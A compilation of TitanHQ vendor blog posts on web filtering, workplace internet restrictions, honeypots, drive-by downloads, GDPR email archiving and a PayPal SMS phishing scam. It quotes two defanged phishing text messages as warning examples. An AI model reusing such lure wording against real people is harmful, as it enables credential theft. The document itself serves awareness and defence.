WebTitan Cloud for WiFi allows businesses to block access to 53 different predefined categories of web content, including pornography, gambling, dating, news, and social media websites. Within those 53 categories are more than 500 million websites in 200 languages that have been assessed for content and categorized. A cloud-based lookup also ensures accurate and flexible filtering based on-page content.
Secure guest WiFi for business means effective malware, ransomware, and phishing protection. With WebTitan Cloud for WiFi deployed, access to compromised websites, phishing sites, and other malicious websites will be blocked.
Flexible policy creation means control over the filter can be delegated to different departments, and controls can be applied for different types of users. Cloud Keys can also be created to allow specific users to bypass policy rules.
A full suite of reports ensures detailed information is always available, with email notifications alerting administrators to attempted policy violations and a real-time browsing view is available.
If you want to take control of your WiFi network or are an MSP looking for an easy-to-use multi-tenant solution to allow you to provide a web filtering service to your clients, WebTitan Cloud for WiFi is a quick, easy to use, and low-cost way of providing secure guest WiFi for business users.
Contact TitanHQ today for further information on WiFI guest network security and to find out how WebTItan can protect your business. Our knowledgeable sales staff will be able to advise you on the best way to improve guest WiFi security and will help you choose the best deployment option. If you want to see WebTitan in action before you make a purchase decision, our sales staff will be happy to schedule a product demonstration and help set up a free trial of the solution.
Guest Wi-Fi Security FAQs
How can I improve guest Wi-Fi security?
You must ensure your guest Wi-Fi network is properly configured. You should set a password for access, ensure traffic is encrypted to prevent interception by selecting WPA2 or WPA3 on the router, ensure guest users cannot access and change the router settings, and you should use a content filtering solution to prevent malware downloads and restrict access to inappropriate website content.
What content can I block on guest Wi-Fi networks?
You have full control over the content that guests can access via your Wi-Fi network. With WebTitan Cloud for Wi-Fi, you can block content using 53 pre-defined categories and can create up to 10 categories of your own using your own keywords. Access to specific websites can be allowed or blocked using whitelists and blacklists. All known malicious websites will be automatically blocked.
Can I see what websites guest users are accessing?
A web filtering solution gives you full visibility into the web content that your employees and guest users are viewing, including providing real-time views of Internet access. This information can give you valuable insights into customer behavior which can guide your marketing efforts. You can also run reports to find out the URLs that users have attempted to visit but were blocked by the web filter.
Will a cloud-based web filter for guest Wi-Fi work on all devices?
There is no software to download onto devices and no restrictions on the devices that can connect to your secure Wi-Fi network. WebTitan Cloud for Wi-Fi works with all operating systems and all devices and allows businesses to offer clean, filtered Internet access for customers on Wi-Fi access points. If required, different filtering controls can be set up for different user groups.
Is SSL inspection necessary?
If you have a web filter that does not have SSL inspection, traffic to and from HTTPS websites will be invisible to the filtering solution. That means files downloaded from HTTPS websites cannot be scanned by the AV engines of the web filter. Since many malicious websites have SSL certificates, a web filter with SSL inspection is essential.
Protection from web-based threats and precision Internet content control for your workforce. Book a FREE WebTitan demo. Book Free Demo
There are many reasons why businesses want to restrict internet access at work. Allowing employees to have unrestricted access to the internet can result in a major drain on productivity. Unfettered internet access can also increase the risk of malware and ransomware downloads, while inappropriate internet access at work can lead to a range of legal issues. Due to the risks involved, it is unsurprising that many firms choose to use a technological solution to enforce acceptable Internet usage policies and block access to malicious websites. This post explores some of the key benefits that come from using a web filter to limit internet access in the workplace and some of the potential problems that can be caused by using content-control software.
The Problem of Personal Internet Use at Work
It is inevitable that employees will slack off from time to time, regardless of whether they have access to the internet but internet access makes slacking off much easier. Simply placing restrictions on the websites that can be accessed will not eradicate time-wasting, but it can allow businesses to make significant gains in productivity. Some employees spend a considerable percentage of the working day on personal internet use, playing online games, or accessing their social media accounts. If every employee in an organization was to spend an hour a day on personal internet use, the productivity losses would be considerable. A company with 100 employees would lose 100 hours a day – That’s a loss of 26,100 working hours a year – and many employees spend much longer each day on personal internet use.
There are other issues that can result from excessive personal internet use at work. When employees use streaming services, download files via P2P networks, or engage in other bandwidth-heavy activities, it will naturally have an impact on internet speeds across the entire organization. Using a web filter to restrict internet access at work and limiting access to certain bandwidth draining activities allows businesses to ensure sufficient bandwidth is available for all employees.
Protection from web-based threats and precision Internet content control for your workforce. Book a FREE WebTitan demo. Book Free Demo
The Danger of Malware and Ransomware Downloads
If employees are accessing social media websites, downloading files, or are visiting questionable websites, the risk of malware or ransomware downloads increases significantly.
Exploit kits probe for vulnerabilities in browsers and plugins, which are then exploited to silently download malware. Traffic is usually directed to these websites through malicious adverts – termed malvertising – although high-traffic websites are constantly being compromised by hackers who add malicious content such as phishing webpages and malware.
Certain types of websites carry a high risk of resulting in malware infections. Allowing employees to access these sites, many of which are not suitable for work, could easily result in a malware or ransomware download.
The operators of legitimate pornographic websites usually take great care to ensure their sites are not compromised or infected with malware. They are, after all, legitimate businesses. However, pornographic content is often used as a lure to spread malware and there are many disreputable adult sites whose purpose is solely to infect visitors with malware or harvest credit card information. Blocking these NSFW sites not only helps to improve productivity and avoid legal issues, but it also reduces the risk of malware infections.
One of the riskiest online activities is the use of torrents sites and P2P file-sharing networks. There are few – if any – controls over the content that is shared via torrents sites and pirated music and video files are often seeded with malware, spyware, and adware. Illegal software downloads are incredibly risky as malware is often bundled in the executable files used to install the software, or in the accompanying Keygen tools that generate product keys to allow the software to be used.
A malware or ransomware attack can prove incredibly costly. Many companies have experienced ransomware attacks that have resulted in systems being taken out of action for several days or even weeks, causing massive losses as the business grinds to a halt. A ransomware attack can result in an entire network being taken out of action, as was the case with the WannaCry attacks in 2017. The NHS in the UK suffered major disruption as a result of the installation of the malware and mitigating the attacks cost £92 million. The NotPetya wiper malware campaign conducted soon after caused widespread damage. The shipping firm Maersk had its systems infected and the clean-up bill has been estimated to be $300 million.
A web filter will not prevent all malware and ransomware attacks, but it is possible to prevent certain categories of ‘risky’ websites from being visited by employees, the filtering solution can be configured to block the downloading of certain file types, and websites known to contain malware or exploit kits can be blocked. Any attempt to visit one of those websites will direct a user to a block screen. Many businesses decide to restrict internet access at work primarily to protect against malware and ransomware downloads.
Protect your customers from web-based threats such as drive-by downloads, exploit kits, and phishing. Book a FREE WebTitan demo. Book Free Demo
Additional Protection Against Phishing Attacks
Phishing is the number one cyber threat faced by businesses. It has been estimated that more than 90% of cyberattacks start with a phishing email. One of the best protections against phishing is a spam filtering solution, which will prevent the majority of malicious messages from being delivered to end users. However, no spam filter is 100% effective and some malicious messages will end up in employees’ inboxes. Employees can be trained how to identify phishing emails and be taught cybersecurity best practices that will reduce susceptibility to phishing attacks, but sooner or later an employee will likely be fooled into clicking a link in an email and will arrive at a phishing website.
When a user is directed to a website and discloses their login credentials, an attacker can gain access to their email account and all the sensitive data contained in that account. The compromised account can also be used to send further phishing emails to other employees in the organization or to customers and business contacts. It is common for a single response to a phishing email to result in several email accounts being compromised.
Phishing attacks are some of the costliest cyberattacks to resolve. Each email in a compromised account must be checked for personally identifiable information and other sensitive data. Manually checking thousands of emails can take weeks and can cost hundreds of thousands of dollars.
A web filter is an additional layer of security that helps organizations improve their defenses against phishing by providing time-of-click protection and blocking attempts to visit malicious websites. When an employee clicks a link to a website that has been added to a blacklist due to past use in phishing campaigns, the user will be directed to a block screen. TitanHQ’s web filtering solution, WebTitan, blocks attempts to access around 60 million malicious websites a week.
Preventing Inappropriate Web Content from Being Accessed
While most employees do not use the internet to access illegal and not-suitable-for-work content, there are always a few bad apples. The problem of accessing pornography at work is a real issue, and could be much worse than you think.
In 2014, a survey conducted by the Barna Group showed 63% of men and 36% of women have viewed pornography at work. A survey in Forbes in 2013 revealed 25% of adults have viewed porn at work, while in another survey, 28% of employees admitted to downloading porn at work. Not only is the accessing of pornography at work a major drain of productivity, but it can also lead to the development of a hostile working environment. Pornography can be used to harass and degrade employees, especially women. There have been cases of employees taking legal action against their employers over the failure to implement content controls in the workplace and prevent pornography from being accessed by coworkers.
Many businesses feel the best way to tackle the problem of pornography access in the workplace is through acceptable usage policies and greater oversight of employees by line managers. When individuals are discovered to be abusing the internet, action can be taken against individuals without having to restrict internet access at work for everyone. This does not always prove effective. Further, when pornography use at work is discovered, employees usually face instant dismissal. That carries a cost to the HR department and productivity losses while new employees are hired and trained.
The easiest solution is to use a web filter to restrict internet access at work. A web filter can be used to block access to specific websites or categories of website content such as pornographic sites and enforce acceptable usage policies. This is one of the most common reasons why businesses restrict internet access at work.
Protection from web-based threats and precision Internet content control for your workforce. Book a FREE WebTitan demo. Book Free Demo
Problems with Using a Web Filter to Restrict Internet Access at Work
A web filter may seem like a quick and easy solution to solve the above issues, but it should be explained that companies that restrict internet access at work with web filters can encounter problems. If you restrict internet access at work using an appliance-based web filtering solution it can result in latency. Each website must be inspected before it is accessed which delays the loading of websites. In the case of secure (HTTPS) sites, each webpage must be decrypted, inspected, and re-encrypted. This places a considerable strain on resources. As more sites switch to HTTPS the problem of latency becomes a real issue.
The solution is to use a DNS-based filtering solution. With DNS-filtering, all filtering occurs in the cloud and there is no latency. There are other benefits too. Cloud-based web filters are more flexible, scalable, and do not require the purchase of any hardware which results in considerable cost savings.
When web filters are used to restrict internet access at work and they lack highly granular controls, there can be issues with the overblocking of website content. Websites that need to be accessed for work purposes may be blocked, which requires the IT support team to spend time whitelisting websites. The solution is to choose a web filter with highly granular controls, which allows content to be easily blocked without also blocking websites that need to be accessed for work purposes.
Should Companies Restrict Internet Access?
While content control software may seem like an ideal way of preventing employees from cyberslacking to make productivity gains, care must be taken when applying those controls otherwise the productivity gains may not be realized. If you restrict internet access at work, employees who were only accessing the occasional personal site may be unhappy with the new restrictions. This can have a negative effect on productivity and create a hostile working environment. Why should all employees be made to suffer because of the actions of a few? Care must therefore be taken when deciding what types of websites to block. With careful and intelligent control, you can make productivity gains and can avoid any staff issues.
How to Control Internet Usage in Office and Avoid Staff Problems
One of the easiest ways to improve productivity while applying controls over internet access is to use a web filtering solution that allows time-based filtering controls to be applied. Employers can use this feature to restrict internet access at work during busy times and relax controls at others. It is easy to block access to certain sites 100% of the time and others only some of the time. With WebTitan, administrators can set standard controls during busy times such as mornings, and relax controls during breaks or outside of office hours.
Protect your customers from web-based threats such as drive-by downloads, exploit kits, and phishing. Book a FREE WebTitan demo. Book Free Demo
How Can I Block Internet Access on an Employee’s Computer?
There are several ways to block internet access on an employee’s computer. If you want to block internet access totally for a specific employee, be that a temporary or permanent block, you can use your existing network hardware or a firewall rule to block a specific IP address.
A web filter allows much more granular controls to be applied, such as blocking specific websites or categories of websites for a specific employee or group of employees. This option is much easier and less time-consuming if you need to block internet access – or implement partial blocks – for more than one employee. With a cloud-based web filter, these controls can be applied quickly and easily through a web portal that can be accessed by the administrator from any computer.
How to Limit Employee Internet Access Selectively
Many businesses want to know how to restrict internet access for employees without totally blocking access to the internet. With WebTitan it is easy to limit employee internet access selectively. Different controls can be set for different employees or groups of employees. If you have sales staff, you may want to do as much as possible to make sure they are always on the phone, and internet controls may need to be more restrictive. The marketing department may require much more lax controls since they will be required to access a broader range of websites for work. Since the filter integrates with LDAP and Active Directory, setting controls for different users and user groups is simple. You can implement organization-wide controls (e.g. adult content), department controls (social media), and individuals controls through LDAP/AD.
Speak to TitanHQ About Controlling Internet Access In the Workplace
Internet content control is quick, easy, and cost-effective with WebTitan. The solution allows you to easily restrict internet access at work and avoid problems associated with web filtering. If you are interested in curbing personal internet use at work and improving your organization’s security posture, contact TitanHQ today for advice. You can also sign up for a free trial and evaluate WebTitan in your own environment before you commit to a purchase and can schedule a product demonstration to see WebTitan in action.
FAQs about Restricting Internet Access at Work
Should I set up a guest Wi-Fi network?
Guest Wi-Fi networks allow visitors to access the Internet through the same equipment as your employees but will ensure that both networks are separated. If a guest user’s device is infected with malware, it will not spread to your primary business network. Guest users will also not be able to access any internal resources or data.
What are the most important guest Wi-Fi security best practices?
Ensure a password is set for the guest network. Make sure that traffic is encrypted using Wi-Fi Protected Access (WPA or WPA2) to prevent data interception. Control the content that can be accessed using a web filter for your Wi-Fi network, and monitor what your guest network is being used for.
What is the cost of a content filter for a Wi-Fi network?
Content filtering for Wi-Fi networks is not expensive considering the protection it provides. Some solutions will cost around $2.50 per user, per month. These tend to be aimed at large enterprises with complex needs. For most businesses, you can get the protection you need for around $1 per user, per month.
Does a web filter work for HTTPS websites?
A web filter will block access to all websites in blacklists, which includes HTTPS websites known to be malicious. A web filter with SSL inspection will decrypt, inspect, then re-encrypt HTTPS sites in real-time and will block access to those sites if they violate user-defined policies.
Is Internet content filtering difficult?
Internet content filtering need not be complicated. With a cloud-based web filter you just make a simple change to point your DNS to your service provider. Log in to your web-based user interface and use the checkboxes to select the content you want to permit or block. All malicious websites will automatically be blocked through the blacklists used by the solution.
For the second year in a row, TitanHQ has collected best-in-category awards from Expert Insights for each of its three products: SpamTitan Email Security, WebTitan Web Security, and ArcTitan Email Archiving.
SpamTitan was recognized and awarded top spot in the Best Email Security Gateway and Best Email Security Solution for Office 365 categories, the DNS-based web filtering solution WebTitan Cloud came top in the Best Web Security Solution category, and the cloud-based email archiving solution, ArcTitan, placed top in the Best Email Archiving Solution for Business category.
The cybersecurity solutions were praised for the level of protection they provided against threats such as malware, ransomware, phishing, viruses, and botnets, with all three solutions recognized for ease-of-use and cost-effectiveness. TitanHQ’s world-class technical and customer support also proved to be a hit with Expert Insights’ researchers and businesses that have adopted the solutions.
Expert Insights is an online publication covering cybersecurity and cloud-based technologies that is used by over 80,000 business leaders, IT professionals and others to obtain invaluable advice to help them make the right purchase decisions. The publication includes insights into B2B products and services, with the UK and US-based teams conducting interviews, industry analyses, and technical product reviews.
Each year, the Fall 2021 Best-of Cybersecurity Awards recognize the leading companies and products for businesses and managed service providers, with the category winners selected based on reviews by independent technical analysts, the Expert insights’ editorial team, and feedback from users of the solutions.
To win one award is a great achievement, but to win 4 shows the commitment of the TitanHQ team to providing businesses with powerful solutions that address their needs that are easy to use and at the right price point, providing timely help and advice for customers whenever it is required.
“TitanHQ are proud to have received continued recognition for all three of our advanced cybersecurity solutions. As the threat landscape continues to be a significant risk to organizations across the globe, we are dedicated to continuous innovation to provide consistent, secure, and reliable protection to our customers,” said Ronan Kavanagh, TitanHQ CEO.
There are many benefits of honeypots, most notably, they can significantly improve your security posture. As such, all organizations should consider implementing a honeypot, but be sure to assess the disadvantages as well as the advantages as you may decide they are not worth the time and effort.
This post covers the pros and cons of honeypots to help you decide whether a honeypot is appropriate for your organization.
What is a honeypot and why are they used?
A honeypot is an additional security protection that can be used alongside a firewall and other security solutions to help protect a network from hackers.
Honeypots, as the name suggests, are designed to catch a hacker’s eye so that their efforts will be drawn to attacking the honeypot rather than a system where they could cause serious harm.
They appear to be an easy entry point into a network to distract attackers from looking at other parts of the system. They are a deliberate hole in the security of the system that can be attacked without causing harm. They allow IT teams to gather valuable intelligence on hackers who are attempting to gain access to their networks.
In contrast to a firewall, which is designed only to keep external attackers out, a honeypot can also identify internal threats and attacks. Many companies are almost blind to attacks from within. A honeypot provides increased visibility and allows IT security teams to defend against attacks that the firewall fails to prevent. There are considerable benefits of honeypots, and many organizations have implemented them as an additional protection against internal and external attacks.
Protection from web-based threats and precision Internet content control for your workforce. Book a FREE WebTitan demo. Book Free Demo
There are many benefits of honeypots!
A honeypot is a system that is set up with the singular purpose of being attacked. It is a system designed to be exploited, hacked, infected with malware, and generally abused by a malicious third party. Why should I do that you may ask? Well, there are many benefits of honeypots.
You may wonder why you should spend your time, effort, and money setting up a system that will attract hackers? Why you should deliberately create a system with weakened defenses that will be exploited? Why even attract interest from malicious third parties?
There are three very good reasons why you should. First. You will be wasting a hacker’s time, and time spent attacking a system that is safe is time not spent hacking a system that will damage your organization if the hacker succeeds.
Secondly, by setting up a honeypot you will be able to see who is attacking you and the methods that are being used. This will give you a very good idea of the types of attacks being used and the defenses you will need to install to protect your real systems and data from attack.
Thirdly, an attack on a honeypot is likely to frustrate a hacker and stop them from hacking your real computer systems.
Security researchers are well aware of the benefits of honeypots. They have been vital in the study of hackers’ behavior. They can be used to determine how systems are attacked and are also a very useful part of system defenses. It is not a question of whether you should set up a honeypot, but rather why you have not already done so.
There are many different types of honeypot that can be implemented. You can set up a dummy system with an entire network topology if you wish. You can have many different hosts, you can include a wide range of services and even different operating systems. In short, an entire system can be set up to appear genuine and allow an attack to take place.
There are many different types of honeypot that can be deployed, although for the purpose of this article we have provided further information on two popular honeypots below: Honeyd and Kippo.
Protect your customers from web-based threats such as drive-by downloads, exploit kits, and phishing. Book a FREE WebTitan demo. Book Free Demo
The Honeyd honeypot
This is a small daemon that can be used to create a network containing many virtual hosts. Each of those hosts can be set up and configured differently. You can run a range of arbitrary services on each, and configure them to appear as if they are running different operating systems. For network simulation purposes, you can create tens of thousands of different hosts on your LAN using Honeyd if you so wish. You can use Honeyd to hide your real system, identify threats, assess risk, and improve your security posture.
Simulate multiple virtual hosts simultaneously
Identify cyberattacks and assign hackers a passive-fingerprint
Simulate numerous TCP/IP stacks
Simulate network topologies
Set up real FTP and HTTP servers, and even UNIX applications under virtual IP addresses
The lowdown on Honeyd
We invited a guest sys admin (Arona Ndiaye) to provide input on the Honeyd honeypot to get the perspective of a Linux administrator. She mainly uses Linux and *nix systems and has tried out Honeyd to get an idea of how it works, what it can do, and its functionality. She installed it on Kali Linux, which was a simple process requiring a single line to be added to the sources .list file, running apt-get update & apt-get install honeyd.
A few tweaks were needed to ensure the firewall had the correct permissions set, along with some simple text editing in a configuration file. That was all that was needed. If any problems are encountered, or more detailed information is required, it is all available on the honeyd website. Most people find the easiest way to get started is to play with the system and to try to attack it, which is what she did.
She was particularly impressed with the information that can be gathered on attacks and scans. The methods of attack were recorded in intricate detail, including how it was possible for hackers to fool NMAP. The overall verdict was “seriously impressive.”
The Kippo honeypot
We also put Kippo to the test; another popular honeypot. Kippo is used to create a dummy SSH server, which allows attackers to conduct brute force attacks. The honeypot can be set with a root password that is particularly easy to guess, such as a simple string of numbers: 123456 for example.
Set up the honeypot with an entire file system, or even better, clone a real system for added realism. The aim is to convince the hacker that he or she is attacking a real system. Once the attacker has successfully managed to log in to the system, everything they subsequently do will be recorded. All actions will be logged, so it is possible to see exactly what happens when a system is attacked.
What is particularly good about Kippo is how detailed the fake system can be. You can really waste a considerable amount of a hacker’s time and get an accurate picture of exactly what they are trying to achieve, the files they upload and download, what malware and exploits they install, and where they put them. You can then use a virtual machine to analyze the attack in detail when you have the time.
Protection from web-based threats and precision Internet content control for your workforce. Book a FREE WebTitan demo. Book Free Demo
Set up combo-honeypots to create a highly elaborate network
Both Kippo and Honeyd are open source, so it is possible to tweak both honeypots to suit your own needs and requirements. You can even combine the two to build up extremely elaborate networks – specifying specific file contents and creating fake systems that appear perfectly real. How much time you spend doing this, and the level of detail you want to add is up to you. If you really want to find out exactly how the systems are attacked to better prepare your real system, these are exceptionally good tools to use.
Adding a honeypot can help to improve your security, but simply setting one up will not. Unfortunately, to gain the benefits of honeypots you will need to invest some time in setting up a realistic network and it will need to be updated and maintained. It must be treated like any other machine or system you use in order for it to be effective. You must also make sure that it is isolated or insulated. Creating a fake system that is easy to attack shouldn’t give a hacker an easy entry point into your real system!
Summary: Main Benefits of Honeypots
Listed below are the main benefits of honeypots:
Observe hackers in action and learn about their behavior
Gather intelligence on attack vectors, malware, and exploits. Use that intel to train your IT staff
Create profiles of hackers who are trying to gain access to your systems
Improve your security posture
Waste hackers’ time and resources
They show you that you are being attacked and that data is valuable when attempting to get budget increases for security.
Disadvantages of Honeypots
We have covered the benefits of honeypots, but are there any disadvantages of honeypots apart from the time taken to set them up?
No system is perfect and there are notable disadvantages of honeypots. One of the main problems is the system is designed to be attacked, so attacks will likely take place. Once the honeypot is accessed it could be used as a launchpad for further attacks. Those attacks could be conducted on an internal system or on another company. Honeypots therefore introduce risk. There is therefore an issue of legal liability. If your honeypot is used in an attack on another business, you could be sued. The level of risk that it introduced will depend on the honeypot. Typically, the more complex the honeypot, the greater the risk is likely to be.
Then there is the question of the resources you will need to set up the system. If you want to create a realistic system that will fool hackers, it needs to look and behave like the real system it is designed to mimic. There are free options available that will make it more cost-effective to set up a honeypot, although they still require resources. The hardware comes at a cost and they require maintenance and monitoring. The cost may be prohibitively expensive for some businesses.
That said, maintenance need not be a major drain of time. In many cases, honeypots can be set up and left. Since there is no expected production activity, monitoring the honeypot and assessing activity will require minimal effort. Automatic alerts are generated when an attack is in progress and any data generated will likely be a real attack. Honeypots may be set up on existing old hardware that would otherwise not be used. In such cases, costs can be kept to a minimum.
Honeypots add complexity to a network, and the more complex a network is, the harder it is to secure. The honeypot could introduce vulnerabilities that could be exploited to gain access to real systems and data.
Finally, the honeypot can only tell you about an attack in progress if the honeypot is directly attacked. If an attack involves other systems and the honeypot is untouched – for instance, if the honeypot was identified as such by the attacker and avoided – it would be necessary to rely on other mechanisms to identify the attack.
Whether the benefits of honeypots outweigh the disadvantages will depend on the nature of your business, how probable it is that attempts will be made to attack your network, and the resources you have available for IT security. Your money could be better spent on other security solutions and your IT team’s time may be better directed to monitoring other systems and addressing vulnerabilities and patching software.
In addition to installing a spam filter to block malware delivery via email, it is important to implement a solution to block drive-by malware downloads. A drive-by malware download is a web-based attack where malware is installed onto a victim’s device
Drive-by malware download attacks are those where malicious programs are downloaded and installed on a device without user consent. The malware may be relatively harmless adware that shows ads to generate income for the developer, spyware that gathers information about a user, or more dangerous malware variants such as keyloggers and banking Trojans that harvest credentials, or even ransomware that encrypts files to extort money from the victim.
Drive-by malware downloads can occur silently, without the user being aware anything untoward has happened by tricking them into visiting a malicious website. That could involve a phishing email with a hyperlink that bypasses an email security solution, occur via a redirect from a compromised website, or by clicking a malicious advert online.
Malicious websites can be encountered simply through normal web browsing and drive-by malware downloads can even occur via legitimate websites. Many websites have third-party ad blocks that generate additional revenue for the website owner. Malicious adverts – termed malvertising – may sneak past the checks performed by third-party ad networks and be displayed to site visitors. If a link is clicked, the user is directed to a malicious website. Threat actors also engage in search engine poisoning, where search engine optimization techniques are used to get malicious websites appearing high up in the search engine listings.
These downloads may occur silently, or individuals may be tricked into downloading malicious software or apps that they believe to be genuine. They install the software and are unaware than malware has also been installed. This week, an alert was issued about a campaign involving a fake .msi installer which is being used to deliver an information stealing malware variant called Jupyter that has been extensively used in attacks on the healthcare and education sectors.
It is important for businesses to protect against drive-by malware downloads, and one of the best ways to do this is by using a web filtering solution. A web filter, as the name suggests, is used to filter out undesirable website content. The consumer versions include parental control solutions on home WiFi networks. Just as you would want to prevent your children from accessing potentially harmful age-inappropriate web content, a web filter is used by businesses to prevent harmful content from being accessed by employees.
WebTitan from TitanHQ is used by businesses, managed services providers, and Internet service providers to block access to malicious, illegal, and other undesirable web content such as pornography and protects against drive-by malware downloads in several ways.
First, it is possible to prevent downloads of certain file types from the Internet – The file types commonly associated with malware (.exe, .js, and .msi for example). Another control to prevent malware downloads is the use of blacklists of IP addresses and domains that have previously been identified as being used for malware distribution. The solution can also be configured to block access to risky website categories that are often used for malware distribution, such as peer-2-peer file sharing networks.
WebTitan is quick and easy to implement and configure, has no impact on page low speeds, can protect any number of users including on-site and remote workers, and the solution is automatically updated with the latest threat intelligence to block malicious content as soon as it is detected.
If you want to block drive-by malware downloads, improve protection against phishing attacks, and carefully control the web content that can be accessed via your wired and wireless networks, contact TitanHQ today for more information about WebTitan. Product demonstrations can be arranged on request, and you can take advantage of a free 14-day trial of the solution.
In this post, we will explain how does GDPR apply to email retention and email archiving, and how an email archive can help you comply with the GDPR.
The EU’s General Data Protection Regulation (GDPR) introduced new requirements for businesses on May 25, 2018. From the compliance date, businesses that collect or process the personal data of EU citizens were required to implement safeguards to protect the personal data of EU citizens. The GDPR also gave EU citizens new rights over their personal data.
The GDPR applies to personal data in all forms, no matter where data are stored. That means personal data in email accounts is covered by the GDPR. Email inboxes and folders can contain a wealth of personal data and that information is subject to the strict privacy and security requirements of the GDPR.
Email data may also need to be retained to comply with laws in the country or state in which your business operates, and certain industries such as finance and healthcare have industry-specific legislation with provisions covering email retention.
There is no minimum or maximum time stipulated for email retention in the GDPR, instead, the GDPR states that personal data can be kept in a form that allows an individual to be identified for no longer than necessary to achieve the purpose for which personal data were collected or processed. The GDPR allows personal data to be processed for archiving purposes.
Reduce storage space, eliminate mailbox quotas and improve email server performance. Book Free Demo
The GDPR requires businesses to implement security measures to ensure personal data are protected. Article 5(f) of the GDPR requires personal data to be protected “against accidental loss, destruction or damage, using appropriate technical or organizational measures.” The easiest way to ensure email data are protected is by using encryption and storing emails in a safe and secure environment where they are protected against unauthorized access, accidental deletion, and tampering – an email archive.
It is worthwhile explaining the difference between an email archive and a backup, as while both can be used to store emails there are important differences between the two. A backup is a temporary repository for email data that ensures emails can be recovered in the event of data loss. Backups are usually only kept for a limited about of time, usually, until a new backup is created. A backup allows the mail system or data in an email account to be restored to a specific point in time. An email archive is used for long-term secure email storage and, in contrast to a backup, it can be searched and individual emails can be quickly found and retrieved.
Many businesses already use an email archiving solution to comply with state, federal, or industry regulations. An email archive is also invaluable for eDiscovery and dealing with customer complaints, as it can be searched and emails can be quickly and easily retrieved on demand. An email archive can also be used to recover email data in the event of a disaster, so it also protects against data loss.
An email archiving solution is important for GDPR compliance as it allows email data to be stored safely to prevent data loss and unauthorized access. Personal data in emails can also be quickly be found, recovered, and deleted securely, if an EU citizen exercises their right to be forgotten, for instance.
ArcTitan, TitanHQ’s secure email archiving solution, is an ideal email archiving solution for GDPR compliance. ArcTitan includes end-to-end encryption for email data, access controls – including role-based controls – to ensure email data are protected against unauthorized access, and ArcTitan creates a tamper-proof record of all email data for the duration of your email data retention policy.
Reduce storage space, eliminate mailbox quotas and improve email server performance. Book Free Demo
If emails need to be found, the archive can be searched and messages can be quickly and easily retrieved. With ArcTitan, you can search 30 million emails a second. Multiple searches can be performed simultaneously, searches can be combined and, in contrast to Office 365 archiving, the same search can be used to find data in the message body and attachments.
ArcTitan is very competitively priced and you only pay for active users. If you are unhappy with your current email archiving provider, changing to ArcTitan is a headache-free process and assistance will be provided by our highly experienced support team. For GDPR compliance, ArcTitan is an ideal email archiving solution.
If you would like to have further information on ArcTitan, contact the TitanHQ team today.
Phishing is commonly associated with spam emails, but it is not the only method of phishing as the PayPal text phishing scam below shows. Phishers use various methods to obtain sensitive information and phishing threats could arrive by email, text message, instant messenger services, and scams can be conducted over the phone.
Phishing is arguably the biggest cyber threat faced by businesses and consumers and can result in a malware infection, the encryption of files via ransomware, theft of sensitive data such as credit/debit card numbers or bank account information, or the email account could be used for sending spam and phishing emails and for malware distribution. A successful phishing attack could prove incredibly costly as bank accounts could easily be emptied. For businesses, malware infections can be catastrophic and billions are lost to business email compromise phishing scams each year.
There are approximately 200 million PayPal users, which makes the online payment service particularly attractive for phishers. PayPal is one of the world’s most commonly spoofed brands. If the brand is spoofed, there is a relatively high probability that the phishing email or text message will be received by a person who has a PayPal account. Further, PayPal accounts usually contain money and they are linked to a bank account and/or credit card. Gaining access to PayPal credentials can see the account and linked bank account emptied.
Phishers use a variety of social engineering techniques to fool end users into installing malware or disclosing their login credentials and other sensitive information. Spam email may be the main method of attack, although the use of text (SMS) messages – often referred to as SMiShing – is growing. This method of phishing can prove more successful for attackers. The PayPal text message phishing scam below is much harder to identify as malicious than many of the PayPal email phishing scams that have been detected in recent weeks.
Beware of this Credible PayPal Text Phishing Scam
This PayPal text phishing scam, and several variants along the same theme, have been detected in recent weeks. The text message appears to have been sent from PayPal from a short code number.
The message reads:
Your account is currently under review. Please complete the following security form to avoid suspension: http://bit[dot]ly/PayPal_-no-sms.eu
Another message reads:
Your account is under review. Please fill in the following security form to avoid lockout: http://bit[dot]ly/_payPal__
These PayPal text phishing scams work because many people do not carefully check messages before clicking links. Click the link on either of those two messages and you will be directed to a website that appears to be the official PayPal website, complete with branding and the normal web layout. However, the websites that the messages direct recipients to are scam sites.
Those sites naturally require the user to enter their login credentials. Doing so passes those credentials to the scammer. The scammer will then use those credentials to access the account, empty it of funds, and plunder the bank account(s) linked to the PayPal account. The password for the account may also be changed to give the attacker more time to make transfers and lock the genuine account holder out of the account.
These scams are particularly effective on smartphones as the full URL of the site being visited is not displayed in the address bar due to the small screen size. It may not be immediately apparent that an individual is not on the genuine PayPal website.
This PayPal text phishing scam shows that you need to always be on your guard, whether accessing your emails or viewing text messages.
Protect your customers from web-based threats such as drive-by downloads, exploit kits, and phishing. Book a FREE WebTitan demo. Book Free Demo
Don’t Become a Victim of an SMS Phishing Scam
The PayPal text phishing scam detailed above is just one example of how cybercriminals obtain sensitive information via text message. Any brand could be impersonated. Shortlinks are often used to hide the fact that the website is not genuine, as is altering the link text to mask the true URL.
To avoid becoming a victim of a SMiShing scam, assume any text message correspondence from a retailer or company could be a scam. If you receive a message – typically a warning about security – take the following steps.
Access your account by typing in the correct URL into your web browser. Do not use the link in the message.
Check the status of your account. If there is a freeze on your account, your account is under review, or it has been suspended, this will be clear when you try to log in.
If in doubt, contact the vendor by telephone or send an email, again using verified contact information and not any contact details supplied in the text message (or email).
Before logging in or disclosing any sensitive information online, check the entire URL to make sure the domain and web page are genuine.
PayPal Email Phishing Scams
This PayPal text phishing scam is one of thousands of phishing campaigns targeting PayPal users. While SMS phishing scams are increasing, most phishing attacks are conducted via email.
PayPal email phishing scams can be highly convincing. The emails contain the familiar PayPal logo, the text in the message body is often well written with no grammatical errors or spelling mistakes, the footers contain all the information you would expect, and the font is the same as that used in genuine PayPal messages.
The purpose of PayPal phishing emails will vary depending on the campaign, although typically the aim is:
To fool someone into disclosing their PayPal username/email address and password combination
To obtain a credit/debit card number, expiry date, and CVV code
To obtain bank account information and other personal information that allows the account to be accessed
To obtain a Social Security number and date of birth for use in identity theft and tax fraud
To install malware - Malware can capture all the above information and more
To install ransomware – Ransomware encrypts files and prevents them from being accessed unless a ransom payment is made
PayPal phishing emails can be very convincing and virtually indistinguishable from genuine communications; however, there are often signs that suggest all may not be what it seems.
Some of the common identifiers of PayPal phishing emails have been detailed below:
The messages contain questionable grammar or spelling mistakes.
The hyperlink text suggests one domain, when hovering the mouse arrow over the link shows it directs the user to a different domain.
The message does not address the account holder personally and starts with Dear PayPal user, user, or PayPal member instead of using the first and last name or the business name.
A link in the email directs the recipient of the message to a website other than the genuine paypal.com domain or local site - paypal.ca, paypal.co.uk for example.
